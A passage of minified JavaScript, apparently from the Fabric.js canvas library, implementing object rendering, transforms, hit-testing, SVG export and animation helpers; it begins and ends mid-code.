O=this.fill,U=this.stroke;S?(this.fill="black",this.stroke="",this._setClippingProperties(x)):this._renderBackground(x),this._render(x),this._drawClipPath(x,this.clipPath),this.fill=O,this.stroke=U},_drawClipPath:function(x,S){!S||(S.canvas=this.canvas,S.shouldCache(),S._transformDone=!0,S.renderCache({forClipping:!0}),this.drawClipPathOnCache(x,S))},drawCacheOnCanvas:function(x){x.scale(1/this.zoomX,1/this.zoomY),x.drawImage(this._cacheCanvas,-this.cacheTranslationX,-this.cacheTranslationY)},isCacheDirty:function(x){if(this.isNotVisible())return!1;if(this._cacheCanvas&&this._cacheContext&&!x&&this._updateCacheCanvas())return!0;if(this.dirty||this.clipPath&&this.clipPath.absolutePositioned||this.statefullCache&&this.hasStateChanged("cacheProperties")){if(this._cacheCanvas&&this._cacheContext&&!x){var S=this.cacheWidth/this.zoomX,O=this.cacheHeight/this.zoomY;this._cacheContext.clearRect(-S/2,-O/2,S,O)}return!0}return!1},_renderBackground:function(x){if(this.backgroundColor){var S=this._getNonTransformedDimensions();x.fillStyle=this.backgroundColor,x.fillRect(-S.x/2,-S.y/2,S.x,S.y),this._removeShadow(x)}},_setOpacity:function(x){this.group&&!this.group._transformDone?x.globalAlpha=this.getObjectOpacity():x.globalAlpha*=this.opacity},_setStrokeStyles:function(x,S){var O=S.stroke;O&&(x.lineWidth=S.strokeWidth,x.lineCap=S.strokeLineCap,x.lineDashOffset=S.strokeDashOffset,x.lineJoin=S.strokeLineJoin,x.miterLimit=S.strokeMiterLimit,O.toLive?"percentage"===O.gradientUnits||O.gradientTransform||O.patternTransform?this._applyPatternForTransformedGradient(x,O):(x.strokeStyle=O.toLive(x,this),this._applyPatternGradientTransform(x,O)):x.strokeStyle=S.stroke)},_setFillStyles:function(x,S){var O=S.fill;O&&(O.toLive?(x.fillStyle=O.toLive(x,this),this._applyPatternGradientTransform(x,S.fill)):x.fillStyle=O)},_setClippingProperties:function(x){x.globalAlpha=1,x.strokeStyle="transparent",x.fillStyle="#000000"},_setLineDash:function(x,S){!S||0===S.length||(1&S.length&&S.push.apply(S,S),x.setLineDash(S))},_renderControls:function(x,S){var K,ee,se,O=this.getViewportTransform(),U=this.calcTransformMatrix();ee=void 0!==(S=S||{}).hasBorders?S.hasBorders:this.hasBorders,se=void 0!==S.hasControls?S.hasControls:this.hasControls,U=g.util.multiplyTransformMatrices(O,U),K=g.util.qrDecompose(U),x.save(),x.translate(K.translateX,K.translateY),x.lineWidth=1*this.borderScaleFactor,this.group||(x.globalAlpha=this.isMoving?this.borderOpacityWhenMoving:1),this.flipX&&(K.angle-=180),x.rotate(p(this.group?K.angle:this.angle)),S.forActiveSelection||this.group?ee&&this.drawBordersInGroup(x,K,S):ee&&this.drawBorders(x,S),se&&this.drawControls(x,S),x.restore()},_setShadow:function(x){if(this.shadow){var U,S=this.shadow,O=this.canvas,K=O&&O.viewportTransform[0]||1,ee=O&&O.viewportTransform[3]||1;U=S.nonScaling?{scaleX:1,scaleY:1}:this.getObjectScaling(),O&&O._isRetinaScaling()&&(K*=g.devicePixelRatio,ee*=g.devicePixelRatio),x.shadowColor=S.color,x.shadowBlur=S.blur*g.browserShadowBlurConstant*(K+ee)*(U.scaleX+U.scaleY)/4,x.shadowOffsetX=S.offsetX*K*U.scaleX,x.shadowOffsetY=S.offsetY*ee*U.scaleY}},_removeShadow:function(x){!this.shadow||(x.shadowColor="",x.shadowBlur=x.shadowOffsetX=x.shadowOffsetY=0)},_applyPatternGradientTransform:function(x,S){if(!S||!S.toLive)return{offsetX:0,offsetY:0};var O=S.gradientTransform||S.patternTransform,U=-this.width/2+S.offsetX||0,K=-this.height/2+S.offsetY||0;return"percentage"===S.gradientUnits?x.transform(this.width,0,0,this.height,U,K):x.transform(1,0,0,1,U,K),O&&x.transform(O[0],O[1],O[2],O[3],O[4],O[5]),{offsetX:U,offsetY:K}},_renderPaintInOrder:function(x){"stroke"===this.paintFirst?(this._renderStroke(x),this._renderFill(x)):(this._renderFill(x),this._renderStroke(x))},_render:function(){},_renderFill:function(x){!this.fill||(x.save(),this._setFillStyles(x,this),"evenodd"===this.fillRule?x.fill("evenodd"):x.fill(),x.restore())},_renderStroke:function(x){if(this.stroke&&0!==this.strokeWidth){if(this.shadow&&!this.shadow.affectStroke&&this._removeShadow(x),x.save(),this.strokeUniform&&this.group){var S=this.getObjectScaling();x.scale(1/S.scaleX,1/S.scaleY)}else this.strokeUniform&&x.scale(1/this.scaleX,1/this.scaleY);this._setLineDash(x,this.strokeDashArray),this._setStrokeStyles(x,this),x.stroke(),x.restore()}},_applyPatternForTransformedGradient:function(x,S){var K,O=this._limitCacheSize(this._getCacheCanvasDimensions()),U=g.util.createCanvasElement(),ee=this.canvas.getRetinaScaling(),se=O.x/this.scaleX/ee,ve=O.y/this.scaleY/ee;U.width=se,U.height=ve,(K=U.getContext("2d")).beginPath(),K.moveTo(0,0),K.lineTo(se,0),K.lineTo(se,ve),K.lineTo(0,ve),K.closePath(),K.translate(se/2,ve/2),K.scale(O.zoomX/this.scaleX/ee,O.zoomY/this.scaleY/ee),this._applyPatternGradientTransform(K,S),K.fillStyle=S.toLive(x),K.fill(),x.translate(-this.width/2-this.strokeWidth/2,-this.height/2-this.strokeWidth/2),x.scale(ee*this.scaleX/O.zoomX,ee*this.scaleY/O.zoomY),x.strokeStyle=K.createPattern(U,"no-repeat")},_findCenterFromElement:function(){return{x:this.left+this.width/2,y:this.top+this.height/2}},_assignTransformMatrixProps:function(){if(this.transformMatrix){var x=g.util.qrDecompose(this.transformMatrix);this.flipX=!1,this.flipY=!1,this.set("scaleX",x.scaleX),this.set("scaleY",x.scaleY),this.angle=x.angle,this.skewX=x.skewX,this.skewY=0}},_removeTransformMatrix:function(x){var S=this._findCenterFromElement();this.transformMatrix&&(this._assignTransformMatrixProps(),S=g.util.transformPoint(S,this.transformMatrix)),this.transformMatrix=null,x&&(this.scaleX*=x.scaleX,this.scaleY*=x.scaleY,this.cropX=x.cropX,this.cropY=x.cropY,S.x+=x.offsetLeft,S.y+=x.offsetTop,this.width=x.width,this.height=x.height),this.setPositionByOrigin(S,"center","center")},clone:function(x,S){var O=this.toObject(S);this.constructor.fromObject?this.constructor.fromObject(O,x):g.Object._fromObject("Object",O,x)},cloneAsImage:function(x,S){var O=this.toCanvasElement(S);return x&&x(new g.Image(O)),this},toCanvasElement:function(x){x||(x={});var S=g.util,O=S.saveObjectTransform(this),U=this.group,K=this.shadow,ee=Math.abs,se=(x.multiplier||1)*(x.enableRetinaScaling?g.devicePixelRatio:1);delete this.group,x.withoutTransform&&S.resetObjectTransform(this),x.withoutShadow&&(this.shadow=null);var z,f,v,ve=g.util.createCanvasElement(),le=this.getBoundingRect(!0,!0),ye=this.shadow,l={x:0,y:0};ye&&(f=ye.blur,z=ye.nonScaling?{scaleX:1,scaleY:1}:this.getObjectScaling(),l.x=2*Math.round(ee(ye.offsetX)+f)*ee(z.scaleX),l.y=2*Math.round(ee(ye.offsetY)+f)*ee(z.scaleY)),v=le.height+l.y,ve.width=Math.ceil(le.width+l.x),ve.height=Math.ceil(v);var P=new g.StaticCanvas(ve,{enableRetinaScaling:!1,renderOnAddRemove:!1,skipOffscreen:!1});"jpeg"===x.format&&(P.backgroundColor="#fff"),this.setPositionByOrigin(new g.Point(P.width/2,P.height/2),"center","center");var G=this.canvas;P.add(this);var X=P.toCanvasElement(se||1,x);return this.shadow=K,this.set("canvas",G),U&&(this.group=U),this.set(O).setCoords(),P._objects=[],P.dispose(),P=null,X},toDataURL:function(x){return x||(x={}),g.util.toDataURL(this.toCanvasElement(x),x.format||"png",x.quality||1)},isType:function(x){return arguments.length>1?Array.from(arguments).includes(this.type):this.type===x},complexity:function(){return 1},toJSON:function(x){return this.toObject(x)},rotate:function(x){var S=("center"!==this.originX||"center"!==this.originY)&&this.centeredRotation;return S&&this._setOriginToCenter(),this.set("angle",x),S&&this._resetOrigin(),this},centerH:function(){return this.canvas&&this.canvas.centerObjectH(this),this},viewportCenterH:function(){return this.canvas&&this.canvas.viewportCenterObjectH(this),this},centerV:function(){return this.canvas&&this.canvas.centerObjectV(this),this},viewportCenterV:function(){return this.canvas&&this.canvas.viewportCenterObjectV(this),this},center:function(){return this.canvas&&this.canvas.centerObject(this),this},viewportCenter:function(){return this.canvas&&this.canvas.viewportCenterObject(this),this},getLocalPointer:function(x,S){S=S||this.canvas.getPointer(x);var O=new g.Point(S.x,S.y),U=this._getLeftTopCoords();return this.angle&&(O=g.util.rotatePoint(O,U,p(-this.angle))),{x:O.x-U.x,y:O.y-U.y}},_setupCompositeOperation:function(x){this.globalCompositeOperation&&(x.globalCompositeOperation=this.globalCompositeOperation)},dispose:function(){g.runningAnimations&&g.runningAnimations.cancelByTarget(this)}}),g.util.createAccessors&&g.util.createAccessors(g.Object),b(g.Object.prototype,g.Observable),g.Object.NUM_FRACTION_DIGITS=2,g.Object.ENLIVEN_PROPS=["clipPath"],g.Object._fromObject=function(x,S,O,U){var K=g[x];S=_(S,!0),g.util.enlivenPatterns([S.fill,S.stroke],function(ee){void 0!==ee[0]&&(S.fill=ee[0]),void 0!==ee[1]&&(S.stroke=ee[1]),g.util.enlivenObjectEnlivables(S,S,function(){var se=U?new K(S[U],S):new K(S);O&&O(se)})})},g.Object.__uid=0)}(we),function(){var E=j.util.degreesToRadians,g={left:-.5,center:0,right:.5},b={top:-.5,center:0,bottom:.5};j.util.object.extend(j.Object.prototype,{translateToGivenOrigin:function(_,y,M,p,D){var S,O,U,w=_.x,x=_.y;return"string"==typeof y?y=g[y]:y-=.5,"string"==typeof p?p=g[p]:p-=.5,"string"==typeof M?M=b[M]:M-=.5,"string"==typeof D?D=b[D]:D-=.5,O=D-M,((S=p-y)||O)&&(U=this._getTransformedDimensions(),w=_.x+S*U.x,x=_.y+O*U.y),new j.Point(w,x)},translateToCenterPoint:function(_,y,M){var p=this.translateToGivenOrigin(_,y,M,"center","center");return this.angle?j.util.rotatePoint(p,_,E(this.angle)):p},translateToOriginPoint:function(_,y,M){var p=this.translateToGivenOrigin(_,"center","center",y,M);return this.angle?j.util.rotatePoint(p,_,E(this.angle)):p},getCenterPoint:function(){var _=new j.Point(this.left,this.top);return this.translateToCenterPoint(_,this.originX,this.originY)},getPointByOrigin:function(_,y){var M=this.getCenterPoint();return this.translateToOriginPoint(M,_,y)},toLocalPoint:function(_,y,M){var D,w,p=this.getCenterPoint();return D=void 0!==y&&void 0!==M?this.translateToGivenOrigin(p,"center","center",y,M):new j.Point(this.left,this.top),w=new j.Point(_.x,_.y),this.angle&&(w=j.util.rotatePoint(w,p,-E(this.angle))),w.subtractEquals(D)},setPositionByOrigin:function(_,y,M){var p=this.translateToCenterPoint(_,y,M),D=this.translateToOriginPoint(p,this.originX,this.originY);this.set("left",D.x),this.set("top",D.y)},adjustPosition:function(_){var w,x,y=E(this.angle),M=this.getScaledWidth(),p=j.util.cos(y)*M,D=j.util.sin(y)*M;this.left+=p*((x="string"==typeof _?g[_]:_-.5)-(w="string"==typeof this.originX?g[this.originX]:this.originX-.5)),this.top+=D*(x-w),this.setCoords(),this.originX=_},_setOriginToCenter:function(){this._originalOriginX=this.originX,this._originalOriginY=this.originY;var _=this.getCenterPoint();this.originX="center",this.originY="center",this.left=_.x,this.top=_.y},_resetOrigin:function(){var _=this.translateToOriginPoint(this.getCenterPoint(),this._originalOriginX,this._originalOriginY);this.originX=this._originalOriginX,this.originY=this._originalOriginY,this.left=_.x,this.top=_.y,this._originalOriginX=null,this._originalOriginY=null},_getLeftTopCoords:function(){return this.translateToOriginPoint(this.getCenterPoint(),"left","top")}})}(),function(){var g=j.util,b=g.degreesToRadians,_=g.multiplyTransformMatrices,y=g.transformPoint;g.object.extend(j.Object.prototype,{oCoords:null,aCoords:null,lineCoords:null,ownMatrixCache:null,matrixCache:null,controls:{},_getCoords:function(M,p){return p?M?this.calcACoords():this.calcLineCoords():((!this.aCoords||!this.lineCoords)&&this.setCoords(!0),M?this.aCoords:this.lineCoords)},getCoords:function(M,p){return function E(M){return[new j.Point(M.tl.x,M.tl.y),new j.Point(M.tr.x,M.tr.y),new j.Point(M.br.x,M.br.y),new j.Point(M.bl.x,M.bl.y)]}(this._getCoords(M,p))},intersectsWithRect:function(M,p,D,w){var x=this.getCoords(D,w);return"Intersection"===j.Intersection.intersectPolygonRectangle(x,M,p).status},intersectsWithObject:function(M,p,D){return"Intersection"===j.Intersection.intersectPolygonPolygon(this.getCoords(p,D),M.getCoords(p,D)).status||M.isContainedWithinObject(this,p,D)||this.isContainedWithinObject(M,p,D)},isContainedWithinObject:function(M,p,D){for(var w=this.getCoords(p,D),S=0,O=M._getImageLines(p?M.aCoords:M.lineCoords);S<4;S++)if(!M.containsPoint(w[S],O))return!1;return!0},isContainedWithinRect:function(M,p,D,w){var x=this.getBoundingRect(D,w);return x.left>=M.x&&x.left+x.width<=p.x&&x.top>=M.y&&x.top+x.height<=p.y},containsPoint:function(M,S,D,w){var x=this._getCoords(D,w),O=(S=S||this._getImageLines(x),this._findCrossPoints(M,S));return 0!==O&&O%2==1},isOnScreen:function(M){if(!this.canvas)return!1;var p=this.canvas.vptCoords.tl,D=this.canvas.vptCoords.br;return!(!this.getCoords(!0,M).some(function(x){return x.x<=D.x&&x.x>=p.x&&x.y<=D.y&&x.y>=p.y})&&!this.intersectsWithRect(p,D,!0,M))||this._containsCenterOfCanvas(p,D,M)},_containsCenterOfCanvas:function(M,p,D){return!!this.containsPoint({x:(M.x+p.x)/2,y:(M.y+p.y)/2},null,!0,D)},isPartiallyOnScreen:function(M){if(!this.canvas)return!1;var p=this.canvas.vptCoords.tl,D=this.canvas.vptCoords.br;return!!this.intersectsWithRect(p,D,!0,M)||this.getCoords(!0,M).every(function(x){return(x.x>=D.x||x.x<=p.x)&&(x.y>=D.y||x.y<=p.y)})&&this._containsCenterOfCanvas(p,D,M)},_getImageLines:function(M){return{topline:{o:M.tl,d:M.tr},rightline:{o:M.tr,d:M.br},bottomline:{o:M.br,d:M.bl},leftline:{o:M.bl,d:M.tl}}},_findCrossPoints:function(M,p){var w,x,S,O,K,U=0;for(var ee in p)if(!((K=p[ee]).o.y<M.y&&K.d.y<M.y||K.o.y>=M.y&&K.d.y>=M.y||(K.o.x===K.d.x&&K.o.x>=M.x?O=K.o.x:(w=(K.d.y-K.o.y)/(K.d.x-K.o.x),x=M.y-0*M.x,S=K.o.y-w*K.o.x,O=-(x-S)/(0-w)),O>=M.x&&(U+=1),2!==U)))break;return U},getBoundingRect:function(M,p){var D=this.getCoords(M,p);return g.makeBoundingBoxFromPoints(D)},getScaledWidth:function(){return this._getTransformedDimensions().x},getScaledHeight:function(){return this._getTransformedDimensions().y},_constrainScale:function(M){return Math.abs(M)<this.minScaleLimit?M<0?-this.minScaleLimit:this.minScaleLimit:0===M?1e-4:M},scale:function(M){return this._set("scaleX",M),this._set("scaleY",M),this.setCoords()},scaleToWidth:function(M,p){var D=this.getBoundingRect(p).width/this.getScaledWidth();return this.scale(M/this.width/D)},scaleToHeight:function(M,p){var D=this.getBoundingRect(p).height/this.getScaledHeight();return this.scale(M/this.height/D)},calcLineCoords:function(){var M=this.getViewportTransform(),p=this.padding,D=b(this.angle),S=g.cos(D)*p,O=g.sin(D)*p,U=S+O,K=S-O,ee=this.calcACoords(),se={tl:y(ee.tl,M),tr:y(ee.tr,M),bl:y(ee.bl,M),br:y(ee.br,M)};return p&&(se.tl.x-=K,se.tl.y-=U,se.tr.x+=U,se.tr.y-=K,se.bl.x-=U,se.bl.y+=K,se.br.x+=K,se.br.y+=U),se},calcOCoords:function(){var M=this._calcRotateMatrix(),p=this._calcTranslateMatrix(),D=this.getViewportTransform(),w=_(D,p),x=_(w,M),S=(x=_(x,[1/D[0],0,0,1/D[3],0,0]),this._calculateCurrentDimensions()),O={};return this.forEachControl(function(U,K,ee){O[K]=U.positionHandler(S,x,ee)}),O},calcACoords:function(){var M=this._calcRotateMatrix(),p=this._calcTranslateMatrix(),D=_(p,M),w=this._getTransformedDimensions(),x=w.x/2,S=w.y/2;return{tl:y({x:-x,y:-S},D),tr:y({x,y:-S},D),bl:y({x:-x,y:S},D),br:y({x,y:S},D)}},setCoords:function(M){return this.aCoords=this.calcACoords(),this.lineCoords=this.group?this.aCoords:this.calcLineCoords(),M||(this.oCoords=this.calcOCoords(),this._setCornerCoords&&this._setCornerCoords()),this},_calcRotateMatrix:function(){return g.calcRotateMatrix(this)},_calcTranslateMatrix:function(){var M=this.getCenterPoint();return[1,0,0,1,M.x,M.y]},transformMatrixKey:function(M){var p="_",D="";return!M&&this.group&&(D=this.group.transformMatrixKey(M)+p),D+this.top+p+this.left+p+this.scaleX+p+this.scaleY+p+this.skewX+p+this.skewY+p+this.angle+p+this.originX+p+this.originY+p+this.width+p+this.height+p+this.strokeWidth+this.flipX+this.flipY},calcTransformMatrix:function(M){var p=this.calcOwnMatrix();if(M||!this.group)return p;var D=this.transformMatrixKey(M),w=this.matrixCache||(this.matrixCache={});return w.key===D?w.value:(this.group&&(p=_(this.group.calcTransformMatrix(!1),p)),w.key=D,w.value=p,p)},calcOwnMatrix:function(){var M=this.transformMatrixKey(!0),p=this.ownMatrixCache||(this.ownMatrixCache={});if(p.key===M)return p.value;var D=this._calcTranslateMatrix(),w={angle:this.angle,translateX:D[4],translateY:D[5],scaleX:this.scaleX,scaleY:this.scaleY,skewX:this.skewX,skewY:this.skewY,flipX:this.flipX,flipY:this.flipY};return p.key=M,p.value=g.composeMatrix(w),p.value},_getNonTransformedDimensions:function(){var M=this.strokeWidth;return{x:this.width+M,y:this.height+M}},_getTransformedDimensions:function(M,p){void 0===M&&(M=this.skewX),void 0===p&&(p=this.skewY);var D,w,x,S=0===M&&0===p;if(this.strokeUniform?(w=this.width,x=this.height):(w=(D=this._getNonTransformedDimensions()).x,x=D.y),S)return this._finalizeDimensions(w*this.scaleX,x*this.scaleY);var O=g.sizeAfterTransform(w,x,{scaleX:this.scaleX,scaleY:this.scaleY,skewX:M,skewY:p});return this._finalizeDimensions(O.x,O.y)},_finalizeDimensions:function(M,p){return this.strokeUniform?{x:M+this.strokeWidth,y:p+this.strokeWidth}:{x:M,y:p}},_calculateCurrentDimensions:function(){var M=this.getViewportTransform(),p=this._getTransformedDimensions();return y(p,M,!0).scalarAdd(2*this.padding)}})}(),j.util.object.extend(j.Object.prototype,{sendToBack:function(){return this.group?j.StaticCanvas.prototype.sendToBack.call(this.group,this):this.canvas&&this.canvas.sendToBack(this),this},bringToFront:function(){return this.group?j.StaticCanvas.prototype.bringToFront.call(this.group,this):this.canvas&&this.canvas.bringToFront(this),this},sendBackwards:function(E){return this.group?j.StaticCanvas.prototype.sendBackwards.call(this.group,this,E):this.canvas&&this.canvas.sendBackwards(this,E),this},bringForward:function(E){return this.group?j.StaticCanvas.prototype.bringForward.call(this.group,this,E):this.canvas&&this.canvas.bringForward(this,E),this},moveTo:function(E){return this.group&&"activeSelection"!==this.group.type?j.StaticCanvas.prototype.moveTo.call(this.group,this,E):this.canvas&&this.canvas.moveTo(this,E),this}}),function(){function E(b,_){if(_){if(_.toLive)return b+": url(#SVGID_"+_.id+"); ";var y=new j.Color(_),M=b+": "+y.toRgb()+"; ",p=y.getAlpha();return 1!==p&&(M+=b+"-opacity: "+p.toString()+"; "),M}return b+": none; "}var g=j.util.toFixed;j.util.object.extend(j.Object.prototype,{getSvgStyles:function(b){var _=this.fillRule?this.fillRule:"nonzero",y=this.strokeWidth?this.strokeWidth:"0",M=this.strokeDashArray?this.strokeDashArray.join(" "):"none",p=this.strokeDashOffset?this.strokeDashOffset:"0",D=this.strokeLineCap?this.strokeLineCap:"butt",w=this.strokeLineJoin?this.strokeLineJoin:"miter",x=this.strokeMiterLimit?this.strokeMiterLimit:"4",S=void 0!==this.opacity?this.opacity:"1",O=this.visible?"":" visibility: hidden;",U=b?"":this.getSvgFilter(),K=E("fill",this.fill);return[E("stroke",this.stroke),"stroke-width: ",y,"; ","stroke-dasharray: ",M,"; ","stroke-linecap: ",D,"; ","stroke-dashoffset: ",p,"; ","stroke-linejoin: ",w,"; ","stroke-miterlimit: ",x,"; ",K,"fill-rule: ",_,"; ","opacity: ",S,";",U,O].join("")},getSvgSpanStyles:function(b,_){var y="; ",p=b.fontFamily?"font-family: "+(-1===b.fontFamily.indexOf("'")&&-1===b.fontFamily.indexOf('"')?"'"+b.fontFamily+"'":b.fontFamily)+y:"",M=b.strokeWidth?"stroke-width: "+b.strokeWidth+y:"",D=b.fontSize?"font-size: "+b.fontSize+"px"+y:"",w=b.fontStyle?"font-style: "+b.fontStyle+y:"",x=b.fontWeight?"font-weight: "+b.fontWeight+y:"",S=b.fill?E("fill",b.fill):"",O=b.stroke?E("stroke",b.stroke):"",U=this.getSvgTextDecoration(b);return U&&(U="text-decoration: "+U+y),[O,M,p,D,w,x,U,S,b.deltaY?"baseline-shift: "+-b.deltaY+"; ":"",_?"white-space: pre; ":""].join("")},getSvgTextDecoration:function(b){return["overline","underline","line-through"].filter(function(_){return b[_.replace("-","")]}).join(" ")},getSvgFilter:function(){return this.shadow?"filter: url(#SVGID_"+this.shadow.id+");":""},getSvgCommons:function(){return[this.id?'id="'+this.id+'" ':"",this.clipPath?'clip-path="url(#'+this.clipPath.clipPathId+')" ':""].join("")},getSvgTransform:function(b,_){var y=b?this.calcTransformMatrix():this.calcOwnMatrix();return'transform="'+j.util.matrixToSVG(y)+(_||"")+'" '},_setSVGBg:function(b){if(this.backgroundColor){var _=j.Object.NUM_FRACTION_DIGITS;b.push("\t\t<rect ",this._getFillAttributes(this.backgroundColor),' x="',g(-this.width/2,_),'" y="',g(-this.height/2,_),'" width="',g(this.width,_),'" height="',g(this.height,_),'"></rect>\n')}},toSVG:function(b){return this._createBaseSVGMarkup(this._toSVG(b),{reviver:b})},toClipPathSVG:function(b){return"\t"+this._createBaseClipPathSVGMarkup(this._toSVG(b),{reviver:b})},_createBaseClipPathSVGMarkup:function(b,_){var y=(_=_||{}).reviver,p=[this.getSvgTransform(!0,_.additionalTransform||""),this.getSvgCommons()].join(""),D=b.indexOf("COMMON_PARTS");return b[D]=p,y?y(b.join("")):b.join("")},_createBaseSVGMarkup:function(b,_){var ee,ve,y=(_=_||{}).noStyle,M=_.reviver,p=y?"":'style="'+this.getSvgStyles()+'" ',D=_.withShadow?'style="'+this.getSvgFilter()+'" ':"",w=this.clipPath,x=this.strokeUniform?'vector-effect="non-scaling-stroke" ':"",S=w&&w.absolutePositioned,O=this.stroke,U=this.fill,K=this.shadow,se=[],le=b.indexOf("COMMON_PARTS"),ye=_.additionalTransform;return w&&(w.clipPathId="CLIPPATH_"+j.Object.__uid++,ve='<clipPath id="'+w.clipPathId+'" >\n'+w.toClipPathSVG(M)+"</clipPath>\n"),S&&se.push("<g ",D,this.getSvgCommons()," >\n"),se.push("<g ",this.getSvgTransform(!1),S?"":D+this.getSvgCommons()," >\n"),ee=[p,x,y?"":this.addPaintOrder()," ",ye?'transform="'+ye+'" ':""].join(""),b[le]=ee,U&&U.toLive&&se.push(U.toSVG(this)),O&&O.toLive&&se.push(O.toSVG(this)),K&&se.push(K.toSVG(this)),w&&se.push(ve),se.push(b.join("")),se.push("</g>\n"),S&&se.push("</g>\n"),M?M(se.join("")):se.join("")},addPaintOrder:function(){return"fill"!==this.paintFirst?' paint-order="'+this.paintFirst+'" ':""}})}(),function(){var E=j.util.object.extend,g="stateProperties";function b(y,M,p){var D={};p.forEach(function(x){D[x]=y[x]}),E(y[M],D,!0)}function _(y,M,p){if(y===M)return!0;if(Array.isArray(y)){if(!Array.isArray(M)||y.length!==M.length)return!1;for(var D=0,w=y.length;D<w;D++)if(!_(y[D],M[D]))return!1;return!0}if(y&&"object"==typeof y){var S,x=Object.keys(y);if(!M||"object"!=typeof M||!p&&x.length!==Object.keys(M).length)return!1;for(D=0,w=x.length;D<w;D++)if("canvas"!==(S=x[D])&&"group"!==S&&!_(y[S],M[S]))return!1;return!0}}j.util.object.extend(j.Object.prototype,{hasStateChanged:function(y){var M="_"+(y=y||g);return Object.keys(this[M]).length<this[y].length||!_(this[M],this,!0)},saveState:function(y){var M=y&&y.propertySet||g,p="_"+M;return this[p]?(b(this,p,this[M]),y&&y.stateProperties&&b(this,p,y.stateProperties),this):this.setupState(y)},setupState:function(y){var M=(y=y||{}).propertySet||g;return y.propertySet=M,this["_"+M]={},this.saveState(y),this}})}(),function(){var E=j.util.degreesToRadians;j.util.object.extend(j.Object.prototype,{_findTargetCorner:function(g,b){if(!this.hasControls||this.group||!this.canvas||this.canvas._activeObject!==this)return!1;var M,p,x,_=g.x,y=g.y,D=Object.keys(this.oCoords),w=D.length-1;for(this.__corner=0;w>=0;w--)if(this.isControlVisible(x=D[w])&&(p=this._getImageLines(b?this.oCoords[x].touchCorner:this.oCoords[x].corner),0!==(M=this._findCrossPoints({x:_,y},p))&&M%2==1))return this.__corner=x,x;return!1},forEachControl:function(g){for(var b in this.controls)g(this.controls[b],b,this)},_setCornerCoords:function(){var g=this.oCoords;for(var b in g){var _=this.controls[b];g[b].corner=_.calcCornerCoords(this.angle,this.cornerSize,g[b].x,g[b].y,!1),g[b].touchCorner=_.calcCornerCoords(this.angle,this.touchCornerSize,g[b].x,g[b].y,!0)}},drawSelectionBackground:function(g){if(!this.selectionBackgroundColor||this.canvas&&!this.canvas.interactive||this.canvas&&this.canvas._activeObject!==this)return this;g.save();var b=this.getCenterPoint(),_=this._calculateCurrentDimensions(),y=this.canvas.viewportTransform;return g.translate(b.x,b.y),g.scale(1/y[0],1/y[3]),g.rotate(E(this.angle)),g.fillStyle=this.selectionBackgroundColor,g.fillRect(-_.x/2,-_.y/2,_.x,_.y),g.restore(),this},drawBorders:function(g,b){b=b||{};var _=this._calculateCurrentDimensions(),y=this.borderScaleFactor,M=_.x+y,p=_.y+y,D=void 0!==b.hasControls?b.hasControls:this.hasControls,w=!1;return g.save(),g.strokeStyle=b.borderColor||this.borderColor,this._setLineDash(g,b.borderDashArray||this.borderDashArray),g.strokeRect(-M/2,-p/2,M,p),D&&(g.beginPath(),this.forEachControl(function(x,S,O){x.withConnection&&x.getVisibility(O,S)&&(w=!0,g.moveTo(x.x*M,x.y*p),g.lineTo(x.x*M+x.offsetX,x.y*p+x.offsetY))}),w&&g.stroke()),g.restore(),this},drawBordersInGroup:function(g,b,_){_=_||{};var y=j.util.sizeAfterTransform(this.width,this.height,b),M=this.strokeWidth,p=this.strokeUniform,D=this.borderScaleFactor,w=y.x+M*(p?this.canvas.getZoom():b.scaleX)+D,x=y.y+M*(p?this.canvas.getZoom():b.scaleY)+D;return g.save(),this._setLineDash(g,_.borderDashArray||this.borderDashArray),g.strokeStyle=_.borderColor||this.borderColor,g.strokeRect(-w/2,-x/2,w,x),g.restore(),this},drawControls:function(g,b){b=b||{},g.save();var y,M,_=this.canvas.getRetinaScaling();return g.setTransform(_,0,0,_,0,0),g.strokeStyle=g.fillStyle=b.cornerColor||this.cornerColor,this.transparentCorners||(g.strokeStyle=b.cornerStrokeColor||this.cornerStrokeColor),this._setLineDash(g,b.cornerDashArray||this.cornerDashArray),this.setCoords(),this.group&&(y=this.group.calcTransformMatrix()),this.forEachControl(function(p,D,w){M=w.oCoords[D],p.getVisibility(w,D)&&(y&&(M=j.util.transformPoint(M,y)),p.render(g,M.x,M.y,b,w))}),g.restore(),this},isControlVisible:function(g){return this.controls[g]&&this.controls[g].getVisibility(this,g)},setControlVisible:function(g,b){return this._controlsVisibility||(this._controlsVisibility={}),this._controlsVisibility[g]=b,this},setControlsVisibility:function(g){for(var b in g||(g={}),g)this.setControlVisible(b,g[b]);return this},onDeselect:function(){},onSelect:function(){}})}(),j.util.object.extend(j.StaticCanvas.prototype,{FX_DURATION:500,fxCenterObjectH:function(E,g){var b=function(){},_=(g=g||{}).onComplete||b,y=g.onChange||b,M=this;return j.util.animate({target:this,startValue:E.left,endValue:this.getCenterPoint().x,duration:this.FX_DURATION,onChange:function(p){E.set("left",p),M.requestRenderAll(),y()},onComplete:function(){E.setCoords(),_()}})},fxCenterObjectV:function(E,g){var b=function(){},_=(g=g||{}).onComplete||b,y=g.onChange||b,M=this;return j.util.animate({target:this,startValue:E.top,endValue:this.getCenterPoint().y,duration:this.FX_DURATION,onChange:function(p){E.set("top",p),M.requestRenderAll(),y()},onComplete:function(){E.setCoords(),_()}})},fxRemove:function(E,g){var b=function(){},_=(g=g||{}).onComplete||b,y=g.onChange||b,M=this;return j.util.animate({target:this,startValue:E.opacity,endValue:0,duration:this.FX_DURATION,onChange:function(p){E.set("opacity",p),M.requestRenderAll(),y()},onComplete:function(){M.remove(E),_()}})}}),j.util.object.extend(j.Object.prototype,{animate:function(){if(arguments[0]&&"object"==typeof arguments[0]){var g,E=[],_=[];for(g in arguments[0])E.push(g);for(var y=0,M=E.length;y<M;y++)_.push(this._animate(g=E[y],arguments[0][g],arguments[1],y!==M-1));return _}return this._animate.apply(this,arguments)},_animate:function(E,g,b,_){var M,y=this;g=g.toString(),b=b?j.util.object.clone(b):{},~E.indexOf(".")&&(M=E.split("."));var p=y.colorProperties.indexOf(E)>-1||M&&y.colorProperties.indexOf(M[1])>-1,D=M?this.get(M[0])[M[1]]:this.get(E);"from"in b||(b.from=D),p||(g=~g.indexOf("=")?D+parseFloat(g.replace("=","")):parseFloat(g));var w={target:this,startValue:b.from,endValue:g,byValue:b.by,easing:b.easing,duration:b.duration,abort:b.abort&&function(x,S,O){return b.abort.call(y,x,S,O)},onChange:function(x,S,O){M?y[M[0]][M[1]]=x:y.set(E,x),!_&&b.onChange&&b.onChange(x,S,O)},onComplete:function(x,S,O){_||(y.setCoords(),b.onComplete&&b.onComplete(x,S,O))}};return 